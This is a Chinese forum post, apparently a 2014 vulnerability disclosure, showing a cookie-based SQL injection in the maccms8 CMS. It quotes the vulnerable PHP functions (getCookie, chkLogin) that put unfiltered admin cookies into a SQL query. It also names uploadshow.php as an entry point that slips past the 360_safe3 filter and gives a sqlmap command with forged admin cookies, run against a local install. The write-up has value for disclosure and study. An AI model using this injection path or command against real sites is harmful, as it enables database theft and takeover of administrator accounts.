是cookie注入,有gpc限制,4处注入点
重现下发现过程
1. inc/common/function.php
直接获取cookie,未过滤
[AppleScript] 纯文本查看 复制代码 <pre><code>function getCookie($key)
{
if(!isset($_COOKIE[$key])){
return '';
}
else{
return $_COOKIE[$key];
}
}
</code>
2. admin/admin_conn.php
chkLogin() 函数获取cookie未过滤
[AppleScript] 纯文本查看 复制代码 </pre>
<pre><code>function chkLogin()
{
global $db;
$m_id = getCookie('adminid'); //这里直接没有过滤
$m_name = getCookie('adminname'); //这里直接没有过滤
$m_check = getCookie('admincheck'); //这里直接没有过滤
/*
print '$m_id='.$m_id.'<br>';
print '$m_name='.$m_name.'<br>';
print '$m_check='.$m_check.'<br>';
*/
if (!isN($m_name) && !isN($m_id)){
/*
print '$sql=';
print 'SELECT * FROM {pre}manager WHERE m_name=\'' . $m_name .'\' AND m_id= \''.$m_id .'\' AND m_status=1';
print '<br>';
*/
$row = $db->getRow('SELECT * FROM {pre}manager WHERE m_name=\'' . $m_name .'\' AND m_id= \''.$m_id .'\' AND m_status=1');
if($row){
$loginValidate = md5($row['m_random'] . $row['m_name'] . $row['m_id']);
if ($m_check != $loginValidate){
sCookie ('admincheck','');
redirect('?m=admin-login','top.');
}
}
else{
sCookie ('admincheck','');
redirect('?m=admin-login','top.');
}
}
else{
redirect('?m=admin-login','top.');
}
}</code>
3. admin/editor/uploadshow.php
但是cookie都通过了360_safe3.php保护,怎么办呢?当然是找漏网之鱼了,发现几处
[AppleScript] 纯文本查看 复制代码 </pre>
<pre><code><?php
require(dirname(__FILE__) .'/../admin_conn.php');
chkLogin();
$action=be("get","action");
$id=be("get","id");
$path=be("get","path");
?></code>
此处调用完全没过滤,直接sqlmap开搞即可
证明:
官网不是这个程序,本地搭的
>sqlmap.py -u "http://localhost/maccms8/admin/editor/uplo
adshow.php" --cookie="adminid=1; adminname=admin; admincheck=aaaa" -p cookie
漏洞作者: Mody | 
发表于 2014-6-22 12:23:51
发表于 2014-6-22 14:42:40
不懂 过来顶一下
......................